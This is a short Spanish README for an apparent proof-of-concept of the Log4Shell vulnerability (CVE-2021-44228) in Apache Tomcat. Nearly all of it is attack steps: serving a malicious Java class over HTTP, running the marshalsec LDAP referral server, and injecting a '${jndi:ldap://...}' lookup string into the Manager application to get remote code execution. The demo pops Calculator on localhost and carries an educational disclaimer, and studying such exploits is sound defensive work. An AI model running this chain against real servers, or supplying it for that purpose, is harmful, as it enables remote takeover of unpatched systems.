
PoC de la vulnerabilidad CVE-2021-44228 de Log4j2 en Apache Tomcat

git clone
cd apache-tomcat-10.0.14/bin
startup.bat
cd exploit
py -m http.server 8888
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
Introduce ${jndi:ldap://127.0.0.1:1389/Exploit} en el campo 'XML Configuration file path' dentro de la aplicación manager en http://localhost:8080/manager/html
La clase Exploit se carga y se logra RCE (se abrirá la aplicación Calculadora)
El repositorio es solo un POC con fines educativos. El propietario del repositorio no es responsable de ningún daño causado. Como nota moral, no seas malvado.
Exploit LDAP https://github.com/mbechler/marshalsec